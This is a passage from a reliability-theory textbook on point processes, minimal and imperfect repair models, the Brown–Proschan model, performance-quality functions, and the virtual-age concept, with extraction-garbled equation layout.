≥ 0 and let Z (t ) be an integral of this function: t Z (t ) = ∫ z (u )du . 0 A point process N (t ), t ≥ 0 with arrival times S i , i = 1, 2,..., S 0 = 0 is called a TRP ( F (t ), z (t ) ) if the arrival times of the transformed process Z ( Si ), i = 1, 2,..., Z ( S 0 ) = 0 form a renewal process with an underlying distribution F (t ) . The function z (t ) is called a trend function and it can be interpreted as the rate of some baseline NHPP, whereas F (t ) is called a renewal distribution. When F (t ) = 1 − exp{−λt} , the TRP reduces to the NHPP. On the other hand, when z (t ) = const , the TRP reduces to a renewal process. Therefore, it contains both the NHPP and the renewal processes as special cases. Similar to Equation (4.15), the intensity process can be defined in this case as λt = z (t )λ ( Z (t ) − Z ( S N (t ) )) . (4.26) Remark 4.2 The modulating structures in Equations (4.25) and (4.26) look rather similar, but the time transformation in the latter equation creates a certain difference. It measures the time elapsed from the last arrival not in chronological time, as in (4.25), but in the transformed time. If, e.g., z (t ) > 1 , then we observe an ‘acceleration of the internal time in the renewal process’ in the following sense: t Z (t ) − Z ( S N (t ) ) = ∫ z (u)du > t − S N (t ) . SN (t ) Therefore, Equation (4.26) can loosely be interpreted as a renewal process analogue of the conventional accelerated life model for the scale-transformed (in accordance with F ( Z (t )) ) lifetimes. The failure rate that corresponds to this distribu- Point Processes and Minimal Repair 81 tion function is z (t )λ ( Z (t )) , where λ (t ) is the failure rate of the baseline Cdf F (t ) . ~ Definition 4.6 states that the point process N (u ) = N ( Z −1 (u )) is a renewal process with an underlying Cdf F (t ) (Lindqvist et al., 2003). Then, e.g., the second equation in (4.16) can be written as E[ N ( Z −1 (u )) / u ] → 1 / m . Substituting t = Z −1 (u ) in Equations (4.16) results in the following asymptotic (as t → ∞ ) results for the TRP: E[ N (t )] = Z (t ) [1 + o(1)], m z (t ) d E[ N (t )] = [1 + o(1)] . dt m These equations show that the TRP can be asymptotically approximated by the NHPP with the rate z (t ) / m . With an obvious exception of a renewal process, the point processes considered in this chapter can be used for imperfect repair modelling. Some criticism in this respect was already discussed in Remark 4.1. We now start describing the approaches that were developed specifically for imperfect repair modelling. 4.4 Minimal Repair The concept of minimal repair is crucial for analysing the performance and maintenance policies of repairable systems. It is the simplest and best understood type of imperfect repair in applications. Minimal repair was introduced by Barlow and Hunter (1960) and was later studied and applied in numerous publications devoted to modelling of repair and maintenance of various systems. It was also independently used in bio-demographic studies (Yashin and Vaupel, 1987). After discussing the definition and interpretations of minimal repair, we consider several important specific models. 4.4.1 Definition and Interpretation The term minimal repair is meaningful. In contrast to an overhaul, it usually describes a minor maintenance or repair operation. The mathematical definition is as follows. Definition 4.7. The survival function of an item (with the Cdf F (t ) and the failure rate λ (t ) ) that had failed and was instantaneously minimally repaired at age x is ⎫⎪ ⎧⎪ x+t F (x + t) = exp⎨− ∫ λ (u )du ⎬ . F ( x) ⎪⎭ ⎪⎩ x (4.27) In accordance with Equation (2.2), this is exactly the survival function of the remaining lifetime of an item of age x . Therefore, the failure rate just after the minimal repair is λ (x) , i.e., the same as it was just before the repair. This means that minimal repair does not change anything in the future stochastic behaviour of 82 Failure Rate Modelling for Reliability and Risk an item, as if a failure did not occur. It is often described as the repair that returns an item to the state it had been in prior to the failure. Sometimes this state is called as bad as old. The term state should be clarified. In fact, the state in this case depends only on the time of failure and does not contain any additional information. Therefore, this type of repair is usually referred to as statistical or black box minimal repair (Bergman, 1985; Finkelstein, 1992). To avoid confusion and to comply with tradition, we will use the term minimal repair (without adding “statistical”) for the operation described by Definition 4.7. Comparison of (4.27) with (4.6) results in the important conclusion that the process of minimal repair is a non-homogeneous Poisson process with rate λr (t ) = λ (t ) . Therefore, in accordance with Equation (4.5), the intensity process λt , t ≥ 0 that describes the process of minimal repairs is also deterministic, i.e., λt = λ (t ) . (4.28) There are two popular interpretations of minimal repair. The first one was introduced to mimic the behaviour of a large system of many components when one of the components is perfectly repaired (replacement). It is clear that in this case the performed repair operation can be approximately qualified as a minimal repair. We must assume additionally that the input of the failure rate of this component in the failure rate of the system is sufficiently small. The second interpretation describes the situation where a failed system is replaced by a statistically identical one, which was operating in the same environment but did not fail. The following example interprets in terms of minimal repairs the notion of a deprivation of life that is used in demographic literature. Example 4.1 Let us think of any death in [t , t + dt ) , whether from accident , heart disease or cancer, as an ‘accident’ that deprives the person involved of the remainder of his expectation of life (Keyfitz, 1985), which in our terms is the MRL function m(t ) , defined by Equation (2.7). Suppose that everyone is saved from death once but thereafter is unprotected and is subject to the usual mortality in the population. Then the average deprivation can be calculated as ∞ D = ∫ f (u )m(u )du , 0 where f (t ) is the density which corresponds to the Cdf F (t ) . In our terms, D is the mean duration of the second cycle in the process of minimal repair with rate λ (t ) . Note that the mean duration of the first cycle is m(0) = m . The case of several additional life chances or, equivalently, subsequent minimal repairs is considered in Vaupel and Yashin (1987). These authors show that the mortality (failure) rate with a possibility of n minimal repairs is λn (t ) = λ (t ) Λn (t ) , n Λr (t ) n!∑ r! r =0 Point Processes and Minimal Repair 83 where λ (t ) is the mortality rate without possibility of minimal repairs. Note that, when λ (t ) = λ , the right-hand side of this equation becomes the failure rate that corresponds to the Erlangian distribution (2.21). 4.4.2 Information-based Minimal Repair It is clear that the observed information in the process of operation of repairable systems is an important source for adequate stochastic modelling. This topic was addressed by Aven and Jensen (1999) on a general mathematical level. We will use minimal repair as an example of this reasoning. It follows from Definition 4.7 that the only available information in the minimal repair model is operational time at failure. On the other hand, other information can also be available. If, e.g., a failure of a multi-component system is caused by a failure of one component and we observe the states (operating or failed) of all components, it is reasonable to repair only this failed component. In accordance with Arjas and Norros (1989), Finkelstein (1992) and Boland and El-Newihi (1998), we define the information-based minimal repair for a system as the minimal repair of the failed component. It is interesting to compare the Cdfs of the remaining lifetimes and the failure rates of the system after the minimal and the information-based minimal repairs, respectively. The following examples (Finkelstein, 1992) consider this comparison for the simplest redundant systems. Example 4.2 Consider a standby system of two components with i.i.d. exponential lifetimes, F (t ) = 1 − exp{−λt} . Then the Cdf of the system is Fs (t ) = 1 − (exp{−λt})(1 + λt ) . The information-based minimal repair of the system restores it to the state (the number of operational components) it had just before the failure, i.e., one operating component. Therefore, the failure rate λsi (t ) after the information-based minimal repair is λ , whereas the failure rate of the system after the minimal repair at time t is λs (t ) = λ2t /(1 + λt ) . Finally, λs (t ) < λsi (t ) for this specific case, and therefore the corresponding remaining lifetimes are ordered in the sense of the failure rate ordering that implies the (usual) stochastic ordering (3.40). This means that the remaining lifetime after the minimal repair of the considered standby system is stochastically larger than the remaining lifetime after the described information-based minimal repair. Generalization to the system of one operating component and n > 1 standby components is straightforward. Example 4.3 Consider a parallel system of independent components with exponential lifetimes: Fi (t ) = 1 − exp{−λi t}, i = 1,2 , and let λ1 > λ2 . Denote by Pi (t ), i = 1,2 the probabilities that the described system after the minimal repair at time t is in a state where the i th component is operating (the other has failed) and by P1+2 (t ) the probability that it is in a state with both operating components. Conditioning on the event that the system is operating at t gives 84 Failure Rate Modelling for Reliability and Risk Pi (t ) = exp{−λi t}(1 − exp{−λ j t}) exp{−λi t} + exp{−λ j t} − exp{−(λ1 + λ2 )t} P1+2 (t ) = , i, j = 1,2; i ≠ j , exp{−(λ1 + λ2 )t} , i, j = 1,2; i ≠ j . exp{−λi t} + exp{−λ j t} − exp{−(λ1 + λ2 )t} After the statistical minimal repair, by definition, our system can obviously be in only one of two states with probabilities denoted by Pi in (t ), i = 1,2 : Pi in (t ) = λi exp{−λi t}(1 − exp{−λ j t}) , i, j = 1,2, λ1 exp{−λ1t}(1 − exp{−λ2t}) + λ2 exp{−λ2t}(1 − exp{−λ1t}) where i ≠ j . Using the assumption λ1 > λ2 , it can be seen that P1in (t ) > P1 (t ) . This means that the information-based minimal repair brings the system to a state where the worst component is functioning with a larger probability than in the case of the minimal repair. Combining this inequality with the following identities: P1in (t ) + P2in (t ) = 1 , P1 (t ) + P2 (t ) + P1+ 2 (t ) = 1 results in the fact that, similar to the previous example, the remaining lifetime after the minimal repair is stochastically larger than that after the information-based minimal repair. This, of course, does not mean that minimal repair is better, as more resources are usually required to perform this operation. 4.5 Brown–Proschan Model When the rate λr (t ) of the Poisson process is an increasing function, the corresponding interarrival times form a stochastically decreasing sequence (Section 4.3.1), and therefore the minimal repair process can be used for imperfect repair modelling. Real-life repair is neither perfect nor minimal. It is usually intermediate in some suitable sense. Note that it can even be worse than a minimal repair (e.g., correction of a software bug can result in new bugs). One of the first imperfect repair models was suggested by Beichelt and Fischer (1980) (see also Brown and Proschan, 1983). This model combines minimal and perfect repairs in the following way. An item is put into operation at t = 0 . Each time it fails, a repair is performed, which is perfect with probability p and is minimal with probability 1 − p . Thus, there can be k = 0,1,2,... imperfect repairs between two successive perfect repairs. The sequence of i.i.d. times between consecutive perfect repairs X i , i = 1,2,... , as usual, forms a renewal process. The Brown–Proschan model was extended by Block et al. (1985) to an agedependent probability p(t ), where t is the time since the last perfect repair. Therefore, each repair is perfect with probability p(t ) and is minimal with prob- Point Processes and Minimal Repair 85 ability 1 − p(t ) . Denote by Fp (t ) the Cdf of the time between two consecutive perfect repairs. Assume that ∞ ∫ p(u )λ (u)du = ∞ , (4.29) 0 where λ (t ) is the failure rate of our item. Then ⎫⎪ ⎧⎪ t Fp (t ) = 1 − exp⎨− ∫ p(u )λ (u )du ⎬ . ⎪⎭ ⎪⎩ 0 (4.30) Note that Condition (4.29) ensures that Fp (t ) is a proper distribution ( Fp (∞) = 1 ). Thus, the failure rate λ p (t ) that corresponds to Fp (t ) is given by the following meaningful, simple relationship: λ p (t ) = p(t )λ (t ) . The formal proof of (4.30) can be found in Beichelt and Fischer (1980) and Block et al. (1985). On the other hand, the following simple general reasoning leads to the same result. Let an item start operating at t = 0 and let T p denote the time to the first perfect repair. We will now ‘construct’ the failure rate λ p (t ) in a direct way. Owing to the properties of the process of minimal repairs, we can reformulate the described model in a more convenient way. Assume that events are arriving in accordance with the NHPP with rate λ (t ) . Each event independently from the history ‘stays in the process’ with probability 1 − p(t ) and terminates the process with probability p(t ) . Therefore, the random variable T p can now be interpreted as the time to termination of our point process. The intensity process that corresponds to the NHPP is equal to its rate and does not depend on the history Η t of the point process of minimal repairs. Moreover, owing to our assumption, the probability of termination also does not depend on this history. Therefore, λ p (t )dt = Pr[T p ∈ [t , t + dt ) | Η t , T p ≥ t ] = p(t )λ (t )dt . (4.31) In Section 8.1, we present a more detailed proof of Equation (4.31) for a slightly different (but mathematically equivalent) setting. 4.6 Performance Quality of Repairable Systems In this section, we will generalize the Brown–Proschan model to the case where the quality of performance of a repairable system is characterized by some decreasing function or by a monotone stochastic process that describes degradation of this system. Along with the minimal (probability 1 − p(t ) ) or perfect (probability p(t ) ) repair considered earlier, the perfect or imperfect ‘restoration’ of a degradation function will be added to the model. In order to proceed with this imperfect repair model, the case of a perfect repair for repairable systems characterized by a performance quality function should be described first. 86 Failure Rate Modelling for Reliability and Risk 4.6.1 Perfect Restoration of Quality Consider first a non-repairable system, which starts operating at t = 0 . Assume that the quality of its performance is characterized by some function of performance Q(t ) to be called the quality function. It is often a decreasing function of time, and this assumption is quite natural for describing the degrading system. In applications, the function Q(t ) can describe some key parameter of a system, e.g., the decreasing in time accuracy of the information measuring system or effectiveness (productivity) of some production process. Assume, for simplicity, that Q(t ) is a deterministic function. Let the system’s time-to-failure distribution be F (t ) and assume that the quality function is equal to 0 for the failed system. Then the expected quality of the system at time t is QE (t ) = E[Q(t ) I (t )] , where I (t ) = 1 if the system is operable at t and I (t ) = 0 when it fails. Now, let the described system be instantly and perfectly repaired at each moment of failure. This means that the quality function is also restored to its initial value Q(0) . Therefore, failures occur in accordance ~ with a renewal process defined by i.i.d. cycles with the Cdf F (t ) . Denote by Q (t ) ≡ Q(Y ) a random value of the quality function at time t , where Y is the random time since the last renewal. Using similar arguments as when deriving ~ Equations (4.10) and (4.11), the following equation for the expected value of Q (t ) can be derived: t ~ QE (t ) ≡ E[Q (t )] = F (t )Q(t ) + ∫ h( x) F (t − x)]Q(t − x)dx . (4.32) 0 The first term on the right-hand side of Equation (4.32) is the probability that there were no failures in [0, t ) , whereas h( x) F (t − x)dx defines the probability that the last failure before t had occurred in [ x, x + dx) . Therefore, the quality function at t is equal to Q(t − x) . The expected quality QE (t ) is an important performance characteristic. Obviously, when Q(t ) ≡ 1 , it reduces to the ‘classical’ availability function. In practice, as in the case of a time-dependent availability, the corresponding numerical methods should be used for obtaining QE (t ) defined by Equation (4.32). On the other hand, there exists a simple stationary solution. After applying the key renewal theorem (Ross, 1996), the following stationary value ( t → ∞ ) of the expected quality QES can be derived: ∞ QES = 1 F ( x)Q( x)dx , m ∫0 (4.33) where m is the mean that corresponds to the Cdf F (t ) . ~ Another important performance characteristic is the probability that Q (t ) exceeds some acceptable level of performance Q0 . Assume that Q(t ) is strictly decreasing and that Q(∞) < Q0 < Q(0). Similar to Equation (4.33), the stationary probability of exceeding level Q0 is Point Processes and Minimal Repair 87 t 1 0 F ( x))dx , m ∫0 PS (Q0 ) = (4.34) where t0 is uniquely determined from the equation Q(t0 ) = Q0 . Example 4.4 Let F (t ) = 1 − exp{−λt}; Q(t ) = exp{−αt}, α > 0 . Then QES = − PS (Q0 ) = λ λ , λ +α (4.35) ln Q0 α λ exp{−λx}dx = 1 − Q0α . (4.36) 0 Let Qt , t ≥ 0 be a stochastic process with decreasing continuous realizations and let it be independent from the considered renewal process of system failures (repairs). Equations (4.33) and (4.34) are generalized in this case to ∞ QES = 1 F ( x) E[Qx ]dx m0 (4.37) and ∞ PS (Q0 ) = 1 F ( x) Pr[Qx ≥ Q0 ]dx , m0 (4.38) respectively. For obtaining PS (Q0 ) , we need the distribution of the first passage time S ( x, Q0 ) i.e., the distribution function of time to the first crossing of level Q0 . Therefore, ∞ 1 PS (Q0 ) = ∫ F ( x)(1 − S ( x, Q0 ))dx . m0 Example 4.5 Let F (t ) = 1 − exp{−λt}, Q(t , Z ) = 1 − exp{− Zt}, where the random variable Z is uniformly distributed in [0, a] , a > 0 . Then t≤d ⎧0, ⎪ , S (t , Q0 ) = ⎨ ln Q0 ⎪1 + at , t > d ⎩ where d = − ln Q0 / a . Finally, λ PS (Q0 ) = 1 − (Q0 ) a + λd ∫ d exp{−λx} dx . x 88 Failure Rate Modelling for Reliability and Risk Remark 4.3 The discussion in this section can be considered a special case of the renewal reward processes (Ross, 1996). 4.6.2 Imperfect Restoration of Quality The results of the previous section were obtained under the assumption that the repair action is perfect. Therefore, after the perfect repair of the described type, the system is in an as good as new state: the Cdf of the current cycle duration is the same as for the previous cycle and the quality of the performance function is also the same at each cycle. Following Finkelstein (1999), consider now a generalization of the Brown– Proschan model of Section 4.5. As in this model, the perfect repair performs the renewal in a statistical sense and restores the quality function to its initial level Q(0) , whereas the minimal repair, defined in statistical terms by Definition 4.7, performs this restoration to a lower (intermediate) level to be specified later. We will call this type of repair the minimal-imperfect repair: it is minimal with respect to the cycle distribution function and is imperfect with respect to the quality function. As a special case, the quality function could be restored to the level it was at just prior to the failure (minimal-minimal repair), but a more general situation is of interest. We will combine the results of Sections 4.5 and 4.6.1. Equation (4.30) defines the Cdf of the time between consecutive perfect repairs. Therefore, the renewal process of instants of perfect repairs is defined by the interarrival times with the Cdf Fp (t ) . We will consider only the stationary value of the quality function in this case, but an analogue of Equation (4.32) can also be derived easily. It follows from Equations (4.30) and (4.33) that the stationary value of the quality function is QES = ∞ ⎧⎪ x ⎫⎪ 1 exp ⎨− ∫ p(u )λ (u )du ⎬ E[Qˆ ( x)]dx , ∫ mP 0 ⎪⎩ 0 ⎪⎭ (4.39) where m p is the mean defined by the Cdf Fp (t ) and Qˆ ( x) is the value of the performance function in x units of time after the last perfect repair. This function is now random, as a random number of minimal-imperfect repairs was performed since the last perfect repair. Different reasonable models for Qˆ ( x) can be suggested (Finkelstein, 1999). The following model is already defined in terms of the corresponding expectation and is probably the simplest: x ⎧⎪ x ⎫⎪ ⎫⎪ ⎧⎪ x E[Qˆ ( x)] = exp⎨− λ (u )du ⎬Q( x) + λ ( y ) exp⎨− λ (u )du ⎬Q( x, y )dy . ⎪⎭ ⎪⎩ 0 ⎪⎩ y ⎪⎭ 0 (4.40) The first term on the right-hand side of Equation (4.40) corresponds to the event when there are no minimal repairs in [0, x) . The integrand of the second term defines the probability that the last minimal-imperfect repair occurred in [ y, y + dy ) , multiplied by a quality function Q( x, y ) , which depends now on the time since the last perfect repair x and on the time of the last minimal-imperfect repair y . The simplest model for Q( x, y ) is Point Processes and Minimal Repair Q ( x, y ) = C ( y) Q( x − y ) , Q(0) 89 (4.41) where C ( y ) is the level of the minimal-imperfect repair performed at time y after the last perfect repair. We also assume that the function C ( y ) is monotonically decreasing and C ( y ) > Q( y ); y > 0; C (0) = Q(0) . Example 4.6 Let Q( x) = exp{−α1 x}; C ( y ) = exp{−α 2 }, α1 > α 2 . Then Q( x, y ) = exp{−α1 x}exp{−(α1 − α 2 ) y} . Let λ (x) ≡ λ and p( x) ≡ p . Performing simple calculations in accordance with Equations (4.39)–(4.41) results in QES = λp α1 − α 2 − λ ⎡ α1 − α 2 ⎤ λ − ⎢ ⎥. ⎣ λ + λp + α1 2α1 − α 2 + λp ⎦ (4.42) If α1 = α 2 = α and p = 1 , Equation (3.42) reduces to QES = λ (λ + α ) , which coincides with Equation (4.35). Similar to Equation (4.38), the stationary probability of exceeding the fixed level Q0 can also be derived (Finkelstein, 1999). 4.7 Minimal Repair in Heterogeneous Populations Chapters 6 and 7 of this book are entirely devoted to mixture failure rate modelling in heterogeneous populations. The discussion of minimal repair in this section is based on definitions and results for mixture failure rates of Chapter 6, which are essential for the presentation in this section. Therefore, it is reasonable to read Chapter 6 first. Some of the relevant equations were also given in the introductory Example 3.1. Note that generalization of the notion of minimal repair to the heterogeneous setting is not straightforward, and we present here only some initial findings (Finkelstein, 2004c). For explanatory purposes, we start with the following reasoning. Consider a stock of n substocks of ‘identical’ items, which are manufactured by n different manufacturers, and therefore their failure rates λi , i = 1,2,..., n differ. Assume that at t = 0 one item is picked up from a randomly chosen (in accordance with some discrete distribution) substock. It is put into operation, whereas all other items are kept in a ‘hot’ standby. It is clear that the lifetime Cdf of the chosen item can be defined by the corresponding discrete mixture. The following scenarios for repair (replacement) actions are of interest: • We do not (or cannot) observe the choice (the manufacturer, or equivalently, the value of λi ). An operating item is replaced on failure by the standby one, which is chosen in accordance with the same random procedure (as at t = 0 ); 90 Failure Rate Modelling for Reliability and Risk • • The same as in the first scenario, but the failed item is replaced with one of the same make; The initial choice is observed as we ‘observe’ i , and therefore we ‘know’ λi and use items from this stock for replacements. Thus, we have described three types of minimal repair for heterogeneous population to be described mathematically in what follows. Consider an item with the Cdf Fm (t ) defined by Equation (6.4) that describes a lifetime in a heterogeneous population. Let S1 = t1 be the realization of the time to the first failure (repair). Then the (usual) minimal repair is obviously defined by Equation (4.27), where F (t ) is substituted by Fm (t ) and x by t1 , whereas the process of minimal repairs of this kind is a NHPP with rate λm (t ) . This is a continuous version of the first scenario of the above reasoning. It is much more interesting to define the information-based minimal repair for the heterogeneous setting. In accordance with the general definition of the information-based minimal repair, an object is restored to the ‘defined’ state it had been in just prior to the failure. It is reasonable to assume in this case that the state is defined by the value of the frailty parameter Z . As we observe only the failures at arrival times S i , i = 1,2,... , the intensity process in [0, t1 ) is deterministic and is equal to the mixture failure rate λm (t ) defined by Equation (6.5). Denote this function in [0, t1 ) by λm (t ) ≡ λ1m (t ) . As the unobserved Z = z ‘was chosen’ at t = 0 , the information-based minimal repair restores it to the state defined by Z = z . This means that the intensity process in [t1 , t2 ) is b λ2m (t , t − t1 ) = ∫ λ (t , z )π ( z | t − t1 )dz , (4.43) a where the mixing density π ( z | t − t1 ) is given by the adjusted Equation (3.10) in the following way: π ( z | t − t1 ) = π ( z ) b F (t − t1 , z ) . (4.44) ∫ F (t − t , z )π ( z )dz 1 a The fact that Z is unobserved does not prevent us from performing and interpreting the information-based minimal repair of the described type. Similar to the (usual) minimal repair case, we can substitute the failed object by the statistically identical one which had also started operating at t = 0 and did not fail in [0, t1 ) . The term “statistically identical” means the same Cdf F (t , z ) in this case. In accordance with Equations (4.43) and (4.44), the corresponding intensity process is ∞ λt = ∑ λnm (t , t − S n−1 ) I ( S n−1 ≤ t < S n ), S 0 = 0 , n=1 where (4.45) Point Processes and Minimal Repair 91 b λnm (t , t − S n−1 ) = ∫ λ (t , z )π ( z | t − S n−1 )dz . (4.46) a Note that, as π ( z | 0) ≡ π ( z ) , the intensity process (4.45) is equal at failure (renewal) points to the ‘unconditional mean’ of λ (t , Z ) , e.g., b λnm ( S n ,0) = ∫ λ ( S n , z )π ( z )dz . a Therefore, the function b λ p (t ) = ∫ λ (t , z )π ( z )dz , a which defines some ‘unconditional mixture failure rate’, is important for describing the model under investigation. The subscript “ P ”, as in Chapter 6, here stands for “Poisson”, as this equation defines the mean intensity function for the doubly stochastic Poisson process (Cox and Isham, 1980). The model defined by the mixture failure rate λP (t ) is relevant when Z is observed, and this corresponds to the last scenario in our introductory reasoning. The following examples (Finkelstein, 2004) deal with comparison of λm (t ), λP (t ) and λt . Example 4.7 Let F (t , z ) be an exponential distribution with the failure rate λ (t , z ) = zλ and let π (z ) be an exponential density in [0, ∞) with parameter ϑ . Therefore, λm (t ) = λ /(λt + ϑ ) , which is a special case of Equation (3.11). It can easily be seen that λP (t ) = λ / ϑ . The corresponding intensity process is λ I ( S n−1 ≤ t < S n ), S 0 = 0. ( − t S λ n =1 n −1 ) + ϑ ∞ λt = ∑ Thus, λm (t ) ≤ λt ≤ λP (t ), t > 0 (4.47) and λt = λP (t ) only at failure points S n , n ≥ 1 , whereas λt = λm (t ) in [0, S1 ) . The failure rates λ (t , z ) in the previous example were ordered in z , i.e., the larger value of z corresponds to the larger value of λ (t , z ) for all t ≥ 0 . The following example shows that Relationship (4.47) does not hold when the failure rates are not ordered in the described sense. Example 4.8 Consider a simple case of a discrete mixture of two distributions with periodic failure rates: 92 Failure Rate Modelling for Reliability and Risk ⎧λ , 0 ≤ t < a ⎪ λ1 (t ) = ⎨2λ , a ≤ t < 2a , ⎪... ⎩ ⎧2λ , ⎪ λ2 (t ) = ⎨λ , ⎪... ⎩ 0≤t 0 is a period. Therefore, these failure rates are not ordered. Assume that the discrete mixing distribution is defined by the probabilities P ( Z = z1 ) = P( Z = z 2 ) = 0.5 . Thus, the function λP (t ) is a constant: λP (t ) = 1.5λ . The corresponding mixture failure rate λm (t ) is also a periodic function with the period 2a and is defined in [0,2a ) as ⎧ λ + 2λ exp{−λt} 0 ≤ t < a, ⎪ 1 + exp{−λt} , ⎪ λm (t ) = ⎨ ⎪ 2λ + λ exp{−2λa} exp{λt} , a ≤ t < 2a. ⎪⎩ 1 + exp{−2λa} exp{λt} It can be shown that the inequality λm (t ) < λP (t ), t > 0 ( λm (0) = 1.5λ ) does not hold in this case. 4.8 Chapter Summary Performance of repairable systems is usually described by renewal processes or alternating renewal processes. Therefore, a repair action in these models is considered to be perfect, i.e., returning a system to an as good as new state. This assumption is not always true, as repair in real life is usually imperfect. The minimal repair is the simplest case of imperfect repair and we consider this topic in detail. It restores a failed system to the state it was in just prior to a failure. We discuss several types of minimal repair that are defined by a different meaning of “the state just prior to repair”. An information-based minimal repair, for example, takes into account the real (not statistical) state of a system on failure, and this creates a basis for more adequate modelling. In the last section, we consider the minimal repair in heterogeneous populations when there are different possibilities for defining this repair action. Instants of repair in technical systems can be considered as points of the corresponding point process. Therefore, the first part of this chapter is devoted to a brief, necessary introduction to the theory of point processes. We focus on a description of the renewal-type processes keeping in mind that the recurring theme in this book is the importance of the complete intensity function (4.4) or, equivalently, of the intensity process (4.2). 5 Virtual Age and Imperfect Repair 5.1 Introduction – Virtual Age In accordance with Equation (2.7), the MRL function of a non-repairable object m(t ) is defined by the Cdf F (x) and the current time t . Therefore, the ‘statistical’ state of an operating item with a given Cdf is defined by t . What happens for a repairable item? Sections 5.2–5.6 of this chapter answer this question. We will show that the notion of virtual age, to be defined later, will be a substitute for t in this case. Note that our discussion of this notion will combine ‘physical’ reasoning (sometimes heuristic) with the corresponding probabilistic modelling. Let a repairable item start operating at time t = 0 . As usual, we assume (for simplicity) that repair is instantaneous. Generalization to the non-instantaneous case is straightforward. The time t since an item started operating will be called the calendar (chronological) age of the repairable item. We will assume usually that an item is deteriorating in some suitable stochastic sense, which is often manifested by an increasing failure rate λ (t ) or by a decreasing MRL function at each cycle. As in the previous chapter, by cycle we mean the time between successive repairs. In contrast to the calendar age t , it is reasonable to consider an age that describes in probabilistic terms the state of a repairable item at each calendar instant of time. It is clear that this age should depend at least on the moments and quality of previous repairs. It is also obvious that both ages coincide for nonrepairable items. If the repair is perfect, this ‘new’ age is just the time elapsed since the last repair, as in the case of renewal processes defined by stochastic intensity (4.15). Minimal repair does not change the statistical state of an item, and therefore, as in the non-repairable case, this age is equal to the calendar age t . As follows from Section 4.3.1, the instants of minimal repair follow the NHPP defined by deterministic stochastic intensity (4.5). Various models can be suggested for defining the corresponding ‘equivalent’ age of a repairable item when a repair is imperfect in a more general sense. In accordance with the established terminology, we will call it the virtual age. A more suitable term would probably be the real age, as it is defined by the real state of an item (e.g., by a level of deterioration). The term virtual age was suggested by Kijima (1989) (see also Kijima et al., 1988) for a meaningful, specific model of im- 94 Failure Rate Modelling for Reliability and Risk perfect repair, but we will use it in a broader sense. An important feature of this model is the assumption that the repair action does not change the baseline Cdf F ( x) (or the baseline failure rate λ ( x ) ) and only the ‘initial time’ changes after each repair. Therefore, the Cdf of a lifetime after repair in Kijima’s model is defined as a remaining lifetime distribution F ( x | t ) . Note that there is no change in the initial age after minimal repair and that it is 0 after each perfect repair. A similar model was independently developed by Finkelstein (1989). The virtual age concept can be relevant for stochastic modelling of nonrepairable items as well, but in this case we must compare the states of identical items operating in different environments. Assume, for example, that the first item is operating in a baseline (reference) environment and the second (identical) item is operating in a more severe environment. It seems natural to define the virtual age of the second item via the comparison of its level of deterioration with the deterioration level of the first item. If the baseline environment is ‘equipped’ with the calendar age, then it is reasonable to assume that the virtual age of an item in the second environment, which was operating for the same amount of time as the first one, is larger than the corresponding calendar age. In Section 5.1, we develop formal models for the described age correspondence. Some results of this section will be used in other sections devoted to repairable items modelling. However, it should be noted that the repairable item is operating in one fixed environment and its virtual age depends on the quality of repair actions. Remark 5.1 Several qualitative approaches to understanding and describing the notion of biological age, which is, in fact, a synonym to virtual age, have been developed in the life sciences (see, e.g., Klemera and Daubal, 2006 and references therein). These authors write: “The concept of biological age can be found in the literature throughout the last 30 years. Unfortunately, the concept lacks a precise and generally accepted definition. The meaning of biological age is often explained as a quantity expressing the ‘true global state’ of an ageing organism better than the corresponding chronological age.” If, for example, someone 50 years old looks like and has vital characteristics (blood pressure, level of cholesterol etc.) of a ‘standard’ 35-year-old individual, we can say that this observation indicates that his virtual (biological) age can be estimated 35. His lifestyle (environment, diet) is probably very healthy. These are, of course, rather vague statements, which will be made more precise in mathematical terms for some simple settings to be considered in this chapter and in Chapter 10. Kijima’s virtual age concept is not the only one used for describing imperfect repair modelling. For example, several failure rate reduction models are developed in the literature. In Section 5.5, we present a brief overview of these models and also perform a comparison with the age reduction (virtual age) models. Most of the imperfect repair models can be used for modelling the corresponding imperfect maintenance actions. Note that repair is often called corrective or unplanned maintenance, whereas the scheduled actions are called preventive maintenance. Different combinations of imperfect (perfect) repair with imperfect (perfect) maintenance and various optimal maintenance policies have been considered in the literature. The interested reader is referred to a recent book by Wang and Pham (2006), where a detailed analysis of this topic with numerous references is given. Virtual Age and Imperfect Repair 95 Remark 5.2 In this chapter, we do not consider statistical inference for imperfect repair modelling. The corresponding results can be found in Guo and Love (1992), Kaminskij and Krivtsov (1998, 2006), Dorado et al. (1997), Hollander and Sethuraman (2002), Kahle and Love (2003) and Kahle (2006), among others. 5.2 Virtual Age for Non-repairable Objects Two main approaches to defining virtual age will be considered. The first one is based on an assumption that lifetimes in different environments are ordered in the sense of the (usual) stochastic ordering of Definition 3.4, which will also be interpreted via the accelerated life model. This reasoning helps in recalculating age when one regime (stress) is switched to another. In the second approach, an observed value of some overall parameter of degradation is compared with the expected value, and the information-based virtual age is defined on the basis of this comparison. 5.2.1 Statistical Virtual Age Consider a degrading item that operates in a baseline environment and denote the corresponding Cdf of time to failure by Fb (t ) . We will use the terms environment, regime and stress interchangeably. By “degrading” we mean that that the quality of performance of an item is decreasing in some suitable sense, e.g., the corresponding wear is increasing or some damage is accumulating. We will implicitly assume that degradation or wear is additive, but formally the virtual age can be defined without this assumption. Let another statistically identical item be operating in a more severe environment with the Cdf of time to failure denoted by Fs (t ) . Assume for simplicity that environments are not varying with time and that distributions are absolutely continuous. Denote by λb (t ) and λs (t ) the failure rates in two environments, respectively. The time-dependent stresses can also be considered (Finkelstein, 1999a). We want to establish an age correspondence between the systems in two regimes by considering the baseline as a reference. It is reasonable to assume that degradation in the second regime is more intensive, and therefore the time for accumulating the same amount of degradation or wear is smaller than in the baseline regime. Therefore, in accordance with Definition 3.4, assume that the lifetimes in two environments are ordered in terms of (usual) stochastic ordering as Fs (t ) < Fb (t ), t ∈ (0, ∞) . (5.1) Note that this is our assumption. Although Inequality (5.1) naturally models the impact of a more severe environment, other weaker orderings can, in principle, describe probabilistic relationships between the corresponding lifetimes in two regimes (e.g., ordering of the mean values, which, in fact, does not lead to the forthcoming results). Inequality (5.1) implies the following equation: 96 Failure Rate Modelling for Reliability and Risk Fs (t ) = Fb (W (t )), W (0) = 0, t ∈ (0, ∞) , (5.2) where the function W (t ) > t is strictly increasing. The latter property obviously follows after applying the inverse function to both sides of (5.2), i.e., W (t ) = Fb−1 ( Fs (t )) and noting that the superposition of two increasing functions is also increasing. Equation (5.2) can be interpreted as a general Accelerated Life Model (ALM) (Cox and Oakes, 1984; Meeker and Escobar, 1998; Finkelstein, 1999, to name a few) with a 